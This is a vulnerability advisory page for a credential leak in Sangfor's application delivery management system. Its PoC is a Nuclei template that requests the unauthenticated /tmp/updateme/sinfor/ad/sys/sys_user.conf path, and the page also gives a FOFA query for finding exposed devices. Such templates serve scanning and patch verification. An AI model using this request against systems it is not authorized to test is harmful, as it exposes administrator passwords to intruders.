sangfor-sysuser-conf: Sangfor Application sys_user.conf Account Password Leakage

日期: 2025-08-01 | 影响软件: sangfor-sysuser-conf | POC: 已公开

漏洞描述

Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password

PoC代码[已公开]

id: sangfor-sysuser-conf

info:
  name: Sangfor Application sys_user.conf Account Password Leakage
  author: DhiyaneshDk
  severity: high
  description: |
    Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20sys_user.conf%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/achuna33/MYExploit/blob/master/src/main/java/com/achuna33/Controllers/SangForController.java
  metadata:
    max-request: 1
    fofa-query: app="SANGFOR-应用交付管理系统"
  tags: lfi,sangfor,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/tmp/updateme/sinfor/ad/sys/sys_user.conf"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "true"
          - "admin"
          - "密码"
          - "<?xml version="
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204e41788465b7e586baefbde4dc5d2ea55127546c93900d48c0712fbb4550372402206ae9abff60a823b10dd8a4614e543230d02a364105da0d4a3c0b504ba26f4ae6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐